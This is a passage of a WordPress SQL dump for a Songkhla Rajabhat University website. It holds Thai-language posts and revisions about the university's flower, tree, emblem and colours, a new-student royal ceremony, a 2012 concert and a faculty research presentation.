(609, 1, '2019-05-27 09:07:22', '2019-05-27 02:07:22', '<p style="text-align: center;"><span style="color: #0000ff;"><strong>ดอกไม้ประจำมหาวิทยาลัยราชภัฏสงขลา</strong></span></p>\r\n<img class="size-medium wp-image-83 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/fw01-300x195.jpg" alt="" width="300" height="195" />\r\n<p style="text-align: center;">ดอกปาริฉัตร</p>\r\n&nbsp;\r\n<p style="text-align: center;"><strong><span style="color: #0000ff;">ต้นไม้ประจำมหาวิทยาลัยราชภัฏสงขลา</span></strong></p>\r\n<img class="size-medium wp-image-84 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/salapee-225x300.jpg" alt="" width="225" height="300" />\r\n<p style="text-align: center;">ต้นสารภี</p>\r\nสารภี : ต้นไม้ประจำมหาวิทยาลัยราชภัฏสงขลา\r\n\r\nต้นไม้ชายฝั่งทะเล ที่ทรงคุณค่า มีลำต้นที่แข็งแกร่ง ทนทาน กลิ่นดอกที่หอมละมุน อ่อนหวาน ให้คุณประโยชน์ทั้งใช้ทำเป็นที่อยู่อาศัย\r\n\r\nและเป็นยา มหาวิทยาลัยราชภัฏสงขลา ซึ่งเป็นแหล่งที่พึ่งพิงหลักด้านวิทยาการท้องถิ่น จึงได้นำมาเป็นต้นไม้ประจำมหาวิทยาลัย', 'ดอกไม้และต้นไม้ประจำมหาวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '608-revision-v1', '', '', '2019-05-27 09:07:22', '2019-05-27 02:07:22', '', 608, 'http://172.17.40.11/wp511/?p=609', 0, 'revision', '', 0),
(611, 1, '2019-05-27 09:08:12', '2019-05-27 02:08:12', ' ', '', '', 'publish', 'closed', 'closed', '', '611', '', '', '2019-05-27 09:12:21', '2019-05-27 02:12:21', '', 0, 'http://172.17.40.11/wp511/?p=611', 4, 'nav_menu_item', '', 0),
(612, 1, '2019-05-27 09:09:34', '2019-05-27 02:09:34', '<span style="color: #0000ff;"><strong>ตราสัญลักษณ์ประจำมหาวิทยาลัยราชภัฎสงขลา</strong></span>\r\n\r\n<img class="size-full wp-image-67 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/logoSKRU3.gif" alt="" width="180" height="220" />\r\n\r\nเป็นรูปวงรีสองวงล้อมตราพระราชลัญจกรของพระบาทสมเด็จพระเจ้าอยู่หัวภูมิพลอดุลยเดช ที่พระราชทานให้แก่มหาวิทยาลัยราชภัฏ ภายในวงรีด้านบนเป็นอักษรภาษาไทยเขียนว่า\r\n\r\n"มหาวิทยาลัยราชภัฏสงขลา" ด้านล่างเป็นอักษรภาษาอังกฤษเขียนว่า " SONGKHLA RAJABHAT UNIVERSITY"\r\n\r\n<img class="alignnone size-full wp-image-77" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/blue.png" alt="" width="77" height="40" /> สีน้ำเงิน แทนค่า สถาบันพระมหากษัตริย์ผู้ให้กำเนิด และพระราชทานนามมหาวิทยาลัยราชภัฏ\r\n\r\n<img class="alignnone size-full wp-image-79" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/green.png" alt="" width="77" height="40" /> สีเขียว แทนค่า แหล่งที่ตั้งของมหาวิทยาลัยราชภัฏ ทั้ง 36 แห่ง ในแหล่งธรรมชาติและสิ่งแวดล้อมที่สวยงาม\r\n\r\n<img class="alignnone size-full wp-image-78" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/gold.png" alt="" width="77" height="40" /> สีทอง แทนค่า ความเจริญรุ่งเรืองทางภูมิปัญญา\r\n\r\n<img class="alignnone size-full wp-image-80" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/orange.png" alt="" width="77" height="40" /> สีส้ม แทนค่า ความเจริญรุ่งเรืองของศิลปวัฒนธรรมท้องถิ่นที่ก้าวไกลใน 36 สถาบัน\r\n\r\n<img class="alignnone size-full wp-image-73" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/white.png" alt="" width="77" height="40" /> สีขาว แทนค่า ความคิดอันบริสุทธิ์ของนักปราชญ์แห่งพระบาทสมเด็จพระเจ้าอยู่หัว\r\n\r\n&nbsp;\r\n\r\n<span style="color: #0000ff;"><strong>สีประจำมหาวิทยาลัย</strong></span>\r\n\r\nสีแดง-ขาว\r\n\r\n<img class="alignnone size-full wp-image-72" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/red.png" alt="" width="77" height="40" /> สีแดง หมายถึง ความรัก ความเข้มแข็ง\r\n\r\n<img class="alignnone size-full wp-image-73" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/white.png" alt="" width="77" height="40" /> สีขาว หมายถึง ความถูกต้อง ความบริสุทธ์\r\n\r\nดังนั้น สีแดง - สีขาว หมายถึง นักศึกษาของมหาวิทยาลัยราชภัฏสงขลาทุกคนต้องกล้าคิด กล้าทำในสิ่งที่ถูกต้องดีงามด้วยความบริสุทธ์ใจ', 'สัญลักษณ์และสีประจำมหาวิทยาลัย', '', 'publish', 'closed', 'closed', '', '%e0%b8%aa%e0%b8%b1%e0%b8%8d%e0%b8%a5%e0%b8%b1%e0%b8%81%e0%b8%a9%e0%b8%93%e0%b9%8c%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%aa%e0%b8%b5%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%88%e0%b8%b3%e0%b8%a1%e0%b8%ab%e0%b8%b2', '', '', '2019-05-27 09:09:34', '2019-05-27 02:09:34', '', 0, 'http://172.17.40.11/wp511/?page_id=612', 0, 'page', '', 0),
(613, 1, '2019-05-27 09:09:34', '2019-05-27 02:09:34', '<span style="color: #0000ff;"><strong>ตราสัญลักษณ์ประจำมหาวิทยาลัยราชภัฎสงขลา</strong></span>\r\n\r\n<img class="size-full wp-image-67 aligncenter" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/logoSKRU3.gif" alt="" width="180" height="220" />\r\n\r\nเป็นรูปวงรีสองวงล้อมตราพระราชลัญจกรของพระบาทสมเด็จพระเจ้าอยู่หัวภูมิพลอดุลยเดช ที่พระราชทานให้แก่มหาวิทยาลัยราชภัฏ ภายในวงรีด้านบนเป็นอักษรภาษาไทยเขียนว่า\r\n\r\n"มหาวิทยาลัยราชภัฏสงขลา" ด้านล่างเป็นอักษรภาษาอังกฤษเขียนว่า " SONGKHLA RAJABHAT UNIVERSITY"\r\n\r\n<img class="alignnone size-full wp-image-77" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/blue.png" alt="" width="77" height="40" /> สีน้ำเงิน แทนค่า สถาบันพระมหากษัตริย์ผู้ให้กำเนิด และพระราชทานนามมหาวิทยาลัยราชภัฏ\r\n\r\n<img class="alignnone size-full wp-image-79" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/green.png" alt="" width="77" height="40" /> สีเขียว แทนค่า แหล่งที่ตั้งของมหาวิทยาลัยราชภัฏ ทั้ง 36 แห่ง ในแหล่งธรรมชาติและสิ่งแวดล้อมที่สวยงาม\r\n\r\n<img class="alignnone size-full wp-image-78" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/gold.png" alt="" width="77" height="40" /> สีทอง แทนค่า ความเจริญรุ่งเรืองทางภูมิปัญญา\r\n\r\n<img class="alignnone size-full wp-image-80" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/orange.png" alt="" width="77" height="40" /> สีส้ม แทนค่า ความเจริญรุ่งเรืองของศิลปวัฒนธรรมท้องถิ่นที่ก้าวไกลใน 36 สถาบัน\r\n\r\n<img class="alignnone size-full wp-image-73" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/white.png" alt="" width="77" height="40" /> สีขาว แทนค่า ความคิดอันบริสุทธิ์ของนักปราชญ์แห่งพระบาทสมเด็จพระเจ้าอยู่หัว\r\n\r\n&nbsp;\r\n\r\n<span style="color: #0000ff;"><strong>สีประจำมหาวิทยาลัย</strong></span>\r\n\r\nสีแดง-ขาว\r\n\r\n<img class="alignnone size-full wp-image-72" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/red.png" alt="" width="77" height="40" /> สีแดง หมายถึง ความรัก ความเข้มแข็ง\r\n\r\n<img class="alignnone size-full wp-image-73" src="http://172.17.40.11/wp511/wp-content/uploads/2019/05/white.png" alt="" width="77" height="40" /> สีขาว หมายถึง ความถูกต้อง ความบริสุทธ์\r\n\r\nดังนั้น สีแดง - สีขาว หมายถึง นักศึกษาของมหาวิทยาลัยราชภัฏสงขลาทุกคนต้องกล้าคิด กล้าทำในสิ่งที่ถูกต้องดีงามด้วยความบริสุทธ์ใจ', 'สัญลักษณ์และสีประจำมหาวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '612-revision-v1', '', '', '2019-05-27 09:09:34', '2019-05-27 02:09:34', '', 612, 'http://172.17.40.11/wp511/?p=613', 0, 'revision', '', 0),
(614, 1, '2019-05-27 09:12:21', '2019-05-27 02:12:21', ' ', '', '', 'publish', 'closed', 'closed', '', '614', '', '', '2019-05-27 09:12:21', '2019-05-27 02:12:21', '', 0, 'http://172.17.40.11/wp511/?p=614', 3, 'nav_menu_item', '', 0),
(615, 1, '2019-05-27 09:29:09', '2019-05-27 02:29:09', 'เมื่อเข้ามาเรียนยัง รั้วมหาวิทยาลัยราชภัฏสงขลา นักศึกษาใหม่ทุกคนจะได้เข้าร่วมในพิธีนำน้องถวายตนเป็นคนของพระราชา ซึ่งเป็นพิธีอันทรงเกียรติที่แสดงถึงการเป็นส่วนหนึ่งของเลือดแห่งราชภัฏโดยสมบูรณ์\r\n\r\nเมื่อเร็วๆ นี้มหาวิทยาลัยราชภัฏสงขลา (มรภ.สงขลา) ได้จัดพิธีนำน้องถวายตัวเป็นคนของพระราชา ณ บริเวณสนามกีฬามหาวิทยาลัยราชภัฏสงขลา\r\n\r\nซึ่งพิธีดังกล่าว เกิดขึ้นโดยความมุ่งหวังของมหาวิทยาลัยราชภัฏสงขลา ในอันที่จะสนองพระมหากรุณาธิคุณของพระบาทสมเด็จพระเจ้าอยู่หัว ที่ทรงรับมหาวิทยาลัยราชภัฏทั่วประเทศ เป็นคนของพระราชา ตามนามพระราชทาน มหาวิทยาลัยราชภัฏสงขลาจึงจัดกิจกรรมดังกล่าวขึ้นเป็นปีที่สองติดต่อกัน\r\n\r\nไฮไลท์ของพิธีดังกล่าว อยู่ที่การอัญเชิญตราพระราชลัญจกรประจำพระองค์ ซึ่งใช้เป็นตราประจำมหาวิทยาลัยราชภัฏทั่วประเทศ นำมาประดิษฐานบนเสลี่ยงหาม และส่งมอบให้กับผู้แทนองค์การนักศึกษา เพื่อมอบต่อไปยังนายกสโมสรนักศึกษาทั้ง 7 คณะ จากนั้นอัญเชิญเสี่ยงหามตรามหาวิทยาลัยราชภัฏ ส่งมอบให้กับตัวแทนกรรมการสภานักศึกษา เพื่ออัญเชิญตราพระราชลัญจกรไปประดิษฐาน ณ แท่นประดิษฐานบนอัฒจันทร์ ปิดท้ายด้วยอธิการบดีมหาวิทยาลัยราชภัฏสงขลา กล่าวรับรองการถวายตัวเป็นคนของพระราชา และมอบเข็มเครื่องหมายให้แก่ประธานโปรแกรมวิชาทุกสาขาวิชา\r\n\r\nในการนี้นักศึกษาใหม่และตัวแทนนักศึกษารุ่นพี่จากทั้ง\r\n\r\n7 คณะ ได้เข้าร่วมกิจกรรมดังกล่าวโดยพร้อมเพรียงกัน บรรยากาศเต็มไปด้วยความภาคภูมิใจและความปีติยินดี กับการได้ชื่อว่าเป็นคนของพระราชา แม้อากาศยามบ่ายจะร้อนอบอ้าวสักเพียงใดก็ตาม แต่รอยยิ้มแห่งความปลื้มปีติก็ประดับอยู่บนใบหน้าของนักศึกษาทุกคนที่เข้า ร่วมกิจกรรม', 'มรภ.สงขลา นำน้องถวายตัวเป็นคนของพระราชา', '', 'publish', 'closed', 'open', '', '%e0%b8%a1%e0%b8%a3%e0%b8%a0-%e0%b8%aa%e0%b8%87%e0%b8%82%e0%b8%a5%e0%b8%b2-%e0%b8%99%e0%b8%b3%e0%b8%99%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b8%96%e0%b8%a7%e0%b8%b2%e0%b8%a2%e0%b8%95%e0%b8%b1%e0%b8%a7%e0%b9%80', '', '', '2019-05-27 09:33:32', '2019-05-27 02:33:32', '', 0, 'http://172.17.40.11/wp511/?p=615', 0, 'post', '', 0),
(616, 1, '2019-05-27 09:29:09', '2019-05-27 02:29:09', '<b>เมื่อเข้ามาเรียนยัง รั้วมหาวิทยาลัยราชภัฏสงขลา นักศึกษาใหม่ทุกคนจะได้เข้าร่วมในพิธีนำน้องถวายตนเป็นคนของพระราชา </b>\r\n\r\n<b>ซึ่งเป็นพิธีอันทรงเกียรติที่แสดงถึงการเป็นส่วนหนึ่งของเลือดแห่งราชภัฏโดย สมบูรณ์</b>\r\n\r\n&nbsp;\r\n\r\nเมื่อเร็วๆ นี้มหาวิทยาลัยราชภัฏสงขลา (มรภ.สงขลา) ได้จัดพิธีนำน้องถวายตัวเป็นคนของพระราชา ณ บริเวณสนามกีฬามหาวิทยาลัยราชภัฏสงขลา\r\n\r\nซึ่งพิธีดังกล่าว เกิดขึ้นโดยความมุ่งหวังของมหาวิทยาลัยราชภัฏสงขลา ในอันที่จะสนองพระมหากรุณาธิคุณของพระบาทสมเด็จพระเจ้าอยู่หัว ที่ทรงรับมหาวิทยาลัยราชภัฏทั่วประเทศ เป็นคนของพระราชา ตามนามพระราชทาน มหาวิทยาลัยราชภัฏสงขลาจึงจัดกิจกรรมดังกล่าวขึ้นเป็นปีที่สองติดต่อกัน\r\n\r\nไฮไลท์ของพิธีดังกล่าว อยู่ที่การอัญเชิญตราพระราชลัญจกรประจำพระองค์ ซึ่งใช้เป็นตราประจำมหาวิทยาลัยราชภัฏทั่วประเทศ นำมาประดิษฐานบนเสลี่ยงหาม และส่งมอบให้กับผู้แทนองค์การนักศึกษา เพื่อมอบต่อไปยังนายกสโมสรนักศึกษาทั้ง 7 คณะ จากนั้นอัญเชิญเสี่ยงหามตรามหาวิทยาลัยราชภัฏ ส่งมอบให้กับตัวแทนกรรมการสภานักศึกษา เพื่ออัญเชิญตราพระราชลัญจกรไปประดิษฐาน ณ แท่นประดิษฐานบนอัฒจันทร์ ปิดท้ายด้วยอธิการบดีมหาวิทยาลัยราชภัฏสงขลา กล่าวรับรองการถวายตัวเป็นคนของพระราชา และมอบเข็มเครื่องหมายให้แก่ประธานโปรแกรมวิชาทุกสาขาวิชา\r\n\r\nในการนี้นักศึกษาใหม่และตัวแทนนักศึกษารุ่นพี่จากทั้ง\r\n\r\n7 คณะ ได้เข้าร่วมกิจกรรมดังกล่าวโดยพร้อมเพรียงกัน บรรยากาศเต็มไปด้วยความภาคภูมิใจและความปีติยินดี กับการได้ชื่อว่าเป็นคนของพระราชา แม้อากาศยามบ่ายจะร้อนอบอ้าวสักเพียงใดก็ตาม แต่รอยยิ้มแห่งความปลื้มปีติก็ประดับอยู่บนใบหน้าของนักศึกษาทุกคนที่เข้า ร่วมกิจกรรม', 'มรภ.สงขลา นำน้องถวายตัวเป็นคนของพระราชา', '', 'inherit', 'closed', 'closed', '', '615-revision-v1', '', '', '2019-05-27 09:29:09', '2019-05-27 02:29:09', '', 615, 'http://172.17.40.11/wp511/?p=616', 0, 'revision', '', 0),
(618, 1, '2019-05-27 09:30:30', '2019-05-27 02:30:30', 'มหาวิทยาลัยราชภัฏสงขลา จัดคอนเสิร์ต “เพลงสงขลา…ป๋าเปรม”\r\n\r\nในวันที่ 21 กรกฎาคม 2555 เวลา 09.30-11.30 น. ณ หอประชุมเฉลิมพระเกียรติ 80 พรรษาฯ มหาวิทยาลัยราชภัฏสงขลา\r\n\r\nโดยจะมีการบรรเลงเพลงเกี่ยวกับจังหวัดสงขลา บทเพลงที่ ฯพณฯ พลเอกเปรม ติณสูลานนท์ ประธานองคมนตรีและรัฐบุรุษ เป็นผู้ประพันธ์\r\n\r\nและบทเพลงที่ ฯพณฯ พลเอกเปรม ชื่นชอบ รวม 16 บทเพลง บรรเลงเพลงโดย วง SKRU ออเคสตร้า และวง SKRU บิ๊กแบนด์ มหาวิทยาลัยราชภัฏสงขลา จำหน่ายบัตรราคา 50 บาท (นักเรียน, นักศึกษา) และบัตรราคา 100 บาท (บุคคลทั่วไป) สอบถามรายละเอียดเพิ่มเติมได้ที่ คณะศิลปกรรมศาสตร์ มหาวิทยาลัยราชภัฏสงขลา หมายเลขโทรศัพท์ 074-336955', 'มรภ.สงขลา จัดคอนเสิร์ตเพลงสงขลา…ป๋าเปรม', '', 'publish', 'closed', 'open', '', '%e0%b8%a1%e0%b8%a3%e0%b8%a0-%e0%b8%aa%e0%b8%87%e0%b8%82%e0%b8%a5%e0%b8%b2-%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%84%e0%b8%ad%e0%b8%99%e0%b9%80%e0%b8%aa%e0%b8%b4%e0%b8%a3%e0%b9%8c%e0%b8%95%e0%b9%80%e0%b8%9e', '', '', '2019-05-27 09:31:03', '2019-05-27 02:31:03', '', 0, 'http://172.17.40.11/wp511/?p=618', 0, 'post', '', 0),
(619, 1, '2019-05-27 09:30:30', '2019-05-27 02:30:30', 'มหาวิทยาลัยราชภัฏสงขลา จัดคอนเสิร์ต “เพลงสงขลา…ป๋าเปรม”\r\n\r\nในวันที่ 21 กรกฎาคม 2555 เวลา 09.30-11.30 น. ณ หอประชุมเฉลิมพระเกียรติ 80 พรรษาฯ มหาวิทยาลัยราชภัฏสงขลา\r\n\r\n&nbsp;\r\n\r\nโดยจะมีการบรรเลงเพลงเกี่ยวกับจังหวัดสงขลา บทเพลงที่ ฯพณฯ พลเอกเปรม ติณสูลานนท์ ประธานองคมนตรีและรัฐบุรุษ เป็นผู้ประพันธ์\r\n\r\nและบทเพลงที่ ฯพณฯ พลเอกเปรม ชื่นชอบ รวม 16 บทเพลง บรรเลงเพลงโดย วง SKRU ออเคสตร้า และวง SKRU บิ๊กแบนด์ มหาวิทยาลัยราชภัฏสงขลา จำหน่ายบัตรราคา 50 บาท (นักเรียน, นักศึกษา) และบัตรราคา 100 บาท (บุคคลทั่วไป) สอบถามรายละเอียดเพิ่มเติมได้ที่ คณะศิลปกรรมศาสตร์ มหาวิทยาลัยราชภัฏสงขลา หมายเลขโทรศัพท์ 074-336955', 'มรภ.สงขลา จัดคอนเสิร์ตเพลงสงขลา…ป๋าเปรม', '', 'inherit', 'closed', 'closed', '', '618-revision-v1', '', '', '2019-05-27 09:30:30', '2019-05-27 02:30:30', '', 618, 'http://172.17.40.11/wp511/?p=619', 0, 'revision', '', 0),
(620, 1, '2019-05-27 09:31:03', '2019-05-27 02:31:03', 'มหาวิทยาลัยราชภัฏสงขลา จัดคอนเสิร์ต “เพลงสงขลา…ป๋าเปรม”\r\n\r\nในวันที่ 21 กรกฎาคม 2555 เวลา 09.30-11.30 น. ณ หอประชุมเฉลิมพระเกียรติ 80 พรรษาฯ มหาวิทยาลัยราชภัฏสงขลา\r\n\r\nโดยจะมีการบรรเลงเพลงเกี่ยวกับจังหวัดสงขลา บทเพลงที่ ฯพณฯ พลเอกเปรม ติณสูลานนท์ ประธานองคมนตรีและรัฐบุรุษ เป็นผู้ประพันธ์\r\n\r\nและบทเพลงที่ ฯพณฯ พลเอกเปรม ชื่นชอบ รวม 16 บทเพลง บรรเลงเพลงโดย วง SKRU ออเคสตร้า และวง SKRU บิ๊กแบนด์ มหาวิทยาลัยราชภัฏสงขลา จำหน่ายบัตรราคา 50 บาท (นักเรียน, นักศึกษา) และบัตรราคา 100 บาท (บุคคลทั่วไป) สอบถามรายละเอียดเพิ่มเติมได้ที่ คณะศิลปกรรมศาสตร์ มหาวิทยาลัยราชภัฏสงขลา หมายเลขโทรศัพท์ 074-336955', 'มรภ.สงขลา จัดคอนเสิร์ตเพลงสงขลา…ป๋าเปรม', '', 'inherit', 'closed', 'closed', '', '618-revision-v1', '', '', '2019-05-27 09:31:03', '2019-05-27 02:31:03', '', 618, 'http://172.17.40.11/wp511/?p=620', 0, 'revision', '', 0),
(621, 1, '2019-05-27 09:31:11', '0000-00-00 00:00:00', '', 'Auto Draft', '', 'auto-draft', 'closed', 'open', '', '', '', '', '2019-05-27 09:31:11', '0000-00-00 00:00:00', '', 0, 'http://172.17.40.11/wp511/?p=621', 0, 'post', '', 0),
(622, 1, '2019-05-27 09:31:12', '0000-00-00 00:00:00', '', 'Auto Draft', '', 'auto-draft', 'closed', 'open', '', '', '', '', '2019-05-27 09:31:12', '0000-00-00 00:00:00', '', 0, 'http://172.17.40.11/wp511/?p=622', 0, 'post', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(623, 1, '2019-05-27 09:31:24', '2019-05-27 02:31:24', 'เมื่อเข้ามาเรียนยัง รั้วมหาวิทยาลัยราชภัฏสงขลา นักศึกษาใหม่ทุกคนจะได้เข้าร่วมในพิธีนำน้องถวายตนเป็นคนของพระราชา\r\n\r\nซึ่งเป็นพิธีอันทรงเกียรติที่แสดงถึงการเป็นส่วนหนึ่งของเลือดแห่งราชภัฏโดย สมบูรณ์\r\n\r\nเมื่อเร็วๆ นี้มหาวิทยาลัยราชภัฏสงขลา (มรภ.สงขลา) ได้จัดพิธีนำน้องถวายตัวเป็นคนของพระราชา ณ บริเวณสนามกีฬามหาวิทยาลัยราชภัฏสงขลา\r\n\r\nซึ่งพิธีดังกล่าว เกิดขึ้นโดยความมุ่งหวังของมหาวิทยาลัยราชภัฏสงขลา ในอันที่จะสนองพระมหากรุณาธิคุณของพระบาทสมเด็จพระเจ้าอยู่หัว ที่ทรงรับมหาวิทยาลัยราชภัฏทั่วประเทศ เป็นคนของพระราชา ตามนามพระราชทาน มหาวิทยาลัยราชภัฏสงขลาจึงจัดกิจกรรมดังกล่าวขึ้นเป็นปีที่สองติดต่อกัน\r\n\r\nไฮไลท์ของพิธีดังกล่าว อยู่ที่การอัญเชิญตราพระราชลัญจกรประจำพระองค์ ซึ่งใช้เป็นตราประจำมหาวิทยาลัยราชภัฏทั่วประเทศ นำมาประดิษฐานบนเสลี่ยงหาม และส่งมอบให้กับผู้แทนองค์การนักศึกษา เพื่อมอบต่อไปยังนายกสโมสรนักศึกษาทั้ง 7 คณะ จากนั้นอัญเชิญเสี่ยงหามตรามหาวิทยาลัยราชภัฏ ส่งมอบให้กับตัวแทนกรรมการสภานักศึกษา เพื่ออัญเชิญตราพระราชลัญจกรไปประดิษฐาน ณ แท่นประดิษฐานบนอัฒจันทร์ ปิดท้ายด้วยอธิการบดีมหาวิทยาลัยราชภัฏสงขลา กล่าวรับรองการถวายตัวเป็นคนของพระราชา และมอบเข็มเครื่องหมายให้แก่ประธานโปรแกรมวิชาทุกสาขาวิชา\r\n\r\nในการนี้นักศึกษาใหม่และตัวแทนนักศึกษารุ่นพี่จากทั้ง\r\n\r\n7 คณะ ได้เข้าร่วมกิจกรรมดังกล่าวโดยพร้อมเพรียงกัน บรรยากาศเต็มไปด้วยความภาคภูมิใจและความปีติยินดี กับการได้ชื่อว่าเป็นคนของพระราชา แม้อากาศยามบ่ายจะร้อนอบอ้าวสักเพียงใดก็ตาม แต่รอยยิ้มแห่งความปลื้มปีติก็ประดับอยู่บนใบหน้าของนักศึกษาทุกคนที่เข้า ร่วมกิจกรรม', 'มรภ.สงขลา นำน้องถวายตัวเป็นคนของพระราชา', '', 'inherit', 'closed', 'closed', '', '615-revision-v1', '', '', '2019-05-27 09:31:24', '2019-05-27 02:31:24', '', 615, 'http://172.17.40.11/wp511/?p=623', 0, 'revision', '', 0),
(624, 1, '2019-05-27 09:32:19', '2019-05-27 02:32:19', '<b>นักวิจัย มรภ.สงขลา หอบผลวิจัยวิธีเรียนรูปแบบใหม่ ผสมผสานการเรียนรู้ในห้องเรียน ควบคู่อีเลินนิ่ง </b><b>ร่วมเสนอผลงานเวทีประชุมวิชาการนานาชาติ</b>\r\n\r\nผศ.ดร.ศศลักษณ์ ทองขาว รองคณบดีบัณฑิตวิทยาลัย และอาจารย์ประจำโปรแกรมวิชาคอมพิวเตอร์ คณะวิทยาศาสตร์และเทคโนโลยี มหาวิทยาลัยราชภัฏสงขลา\r\n\r\nเปิดเผยว่า เมื่อวันที่ 26-28 มิถุนายน ที่ผ่านมา ได้เข้าร่วมนำเสนอผลงานวิจัยในการประชุมวิชาการนานาชาติ The Education, Learning, Styles, Individual differences Network (ELSIN 2012) ครั้งที่ 17 ณ เมืองคาดีฟ ประเทศสหราชอาณาจักร ในหัวข้อเรื่อง ลีลาการเรียนรู้ในสถานการณ์การเรียนรู้แบบผสมผสานบนระบบจัดการการเรียนรู้ (Learning Management System) : กรณีศึกษาเชิงตีความ (Learning Styles and Blended learning Situations on LMS: An Interpretive Case Study) ซึ่งเป็นการศึกษาเกี่ยวกับวิธีการเรียนของผู้เรียนแบบใหม่ ที่เน้นถึงรูปแบบการเรียนรู้แบบผสม (Blended learning) ระหว่างการเรียนแบบในห้องเรียน และการใช้เทคโนโลยีคอมพิวเตอร์ในรูปแบบของการเรียนรู้ผ่านสื่อ อิเล็กทรอนิกส์ หรืออีเลินนิ่ง (e-learning) ซึ่งเป็นรูปแบบใหม่ที่ได้จากงานวิจัย และนำมาปรับใช้ในสถานการณ์จริงในมหาวิทยาลัย ซึ่งนอกจากมหาวิทยาลัยราชภัฏสงขลาจะได้ประโยชน์จากงานวิจัยชิ้นนี้แล้ว งานวิจัยนี้ยังสามารถปรับใช้ได้กับมหาวิทยาลัยอื่นๆ ที่มีรูปแบบการเรียนคล้ายคลึงกันอีกด้วย\r\n\r\nรองคณบดีบัณฑิตวิทยาลัย มรภ.สงขลา กล่าวว่า การประชุมวิชาการนานาชาติครั้งนี้ จัดโดยองค์กร ELSIN ซึ่งก่อตั้งขึ้นเมื่อปี ค.ศ.1995 เป็นการรวมตัวกันของนักวิชาการทั้งสายวิชาการทางการศึกษา สายวิทยาการคอมพิวเตอร์ และสายเทคโนโลยีสารสนเทศ โดยรูปแบบการนำเสนองานวิจัยประกอบด้วย 2 ส่วน คือ การนำเสนอด้วยปากเปล่า (oral presentation) และการนำเสนอบทความทางวิชาการฉบับเต็ม (full paper) ซึ่งบทความทางวิชาการฉบับเต็มนั้น ผู้นำเสนอจะต้องส่งให้องค์กร ELSIN อ่านก่อนอย่างน้อย 1 เดือน อย่างไรก็ดี การนำเสนองานวิจัยในครั้งนี้ได้รับความสนใจจากนักวิชาการต่างประเทศโดยเฉพาะ กลุ่มประเทศในสหภาพยุโรป และอเมริกา ให้ความสนใจส่งผลงานวิจัยเข้าร่วมนำเสนอกว่า 100 เรื่อง\r\n\r\n“การนำเสนอผลงานในครั้งนี้ถือเป็นมิติใหม่ ของมหาวิทยาลัยราชภัฏสงขลา นอกจากจะนำเสนอผลงานทางวิชาการแล้ว ยังได้ประชาสัมพันธ์มหาวิทยาลัย ให้นักวิชาการทั่วโลกให้รู้จัก ทั้งในเวทีวิชาการและการพบปะนอกรอบ อีกทั้งยังเป็นการสร้างเครือข่ายมหาวิทยาลัย ซึ่งถือเป็นส่วนหนึ่งในการขับเคลื่อนผลงานด้านการวิจัยของมหาวิทยาลัยราชภัฏ สงขลาไปสู่สากล” ผศ.ดร.ศศลักษณ์ กล่าว', 'มรภ.สงขลา วิจัยวิธีเรียนแบบใหม่', '', 'publish', 'closed', 'open', '', '%e0%b8%a1%e0%b8%a3%e0%b8%a0-%e0%b8%aa%e0%b8%87%e0%b8%82%e0%b8%a5%e0%b8%b2-%e0%b8%a7%e0%b8%b4%e0%b8%88%e0%b8%b1%e0%b8%a2%e0%b8%a7%e0%b8%b4%e0%b8%98%e0%b8%b5%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99', '', '', '2019-05-27 09:32:37', '2019-05-27 02:32:37', '', 0, 'http://172.17.40.11/wp511/?p=624', 0, 'post', '', 0),
(625, 1, '2019-05-27 09:32:19', '2019-05-27 02:32:19', '<b>นัก วิจัย มรภ.สงขลา หอบผลวิจัยวิธีเรียนรูปแบบใหม่ ผสมผสานการเรียนรู้ในห้องเรียน ควบคู่อีเลินนิ่ง </b><b>ร่วมเสนอผลงานเวทีประชุมวิชาการนานาชาติ</b>\r\n\r\nผศ.ดร.ศศลักษณ์ ทองขาว รองคณบดีบัณฑิตวิทยาลัย และอาจารย์ประจำโปรแกรมวิชาคอมพิวเตอร์ คณะวิทยาศาสตร์และเทคโนโลยี มหาวิทยาลัยราชภัฏสงขลา\r\n\r\nเปิดเผยว่า เมื่อวันที่ 26-28 มิถุนายน ที่ผ่านมา ได้เข้าร่วมนำเสนอผลงานวิจัยในการประชุมวิชาการนานาชาติ The Education, Learning, Styles, Individual differences Network (ELSIN 2012) ครั้งที่ 17 ณ เมืองคาดีฟ ประเทศสหราชอาณาจักร ในหัวข้อเรื่อง ลีลาการเรียนรู้ในสถานการณ์การเรียนรู้แบบผสมผสานบนระบบจัดการการเรียนรู้ (Learning Management System) : กรณีศึกษาเชิงตีความ (Learning Styles and Blended learning Situations on LMS: An Interpretive Case Study) ซึ่งเป็นการศึกษาเกี่ยวกับวิธีการเรียนของผู้เรียนแบบใหม่ ที่เน้นถึงรูปแบบการเรียนรู้แบบผสม (Blended learning) ระหว่างการเรียนแบบในห้องเรียน และการใช้เทคโนโลยีคอมพิวเตอร์ในรูปแบบของการเรียนรู้ผ่านสื่อ อิเล็กทรอนิกส์ หรืออีเลินนิ่ง (e-learning) 